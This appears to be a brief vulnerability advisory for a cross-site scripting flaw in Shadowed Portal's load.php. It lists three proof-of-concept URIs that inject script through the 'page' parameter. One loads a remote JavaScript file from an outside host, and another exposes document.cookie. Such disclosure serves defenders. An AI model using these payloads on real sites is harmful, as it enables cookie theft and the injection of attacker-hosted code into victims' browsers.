|
Shadowed Portal Load.PHP Cross-Site Scripting Vulnerability
This issue can be exploited through a web client. The following proof-of-concept URIs are available: http://www.example.com/path/load.php?mod=pages&page="><script src=http://liz0.li.funpic.org/hacked.js></script> http://www.example.com/path/load.php?mod=pages&page="><script>alert(/BiyoSecurityTeam/)</script> http://www.example.com/path/load.php?mod=pages&page="><script>alert(document.cookie)</script> |
|
|
Privacy Statement |
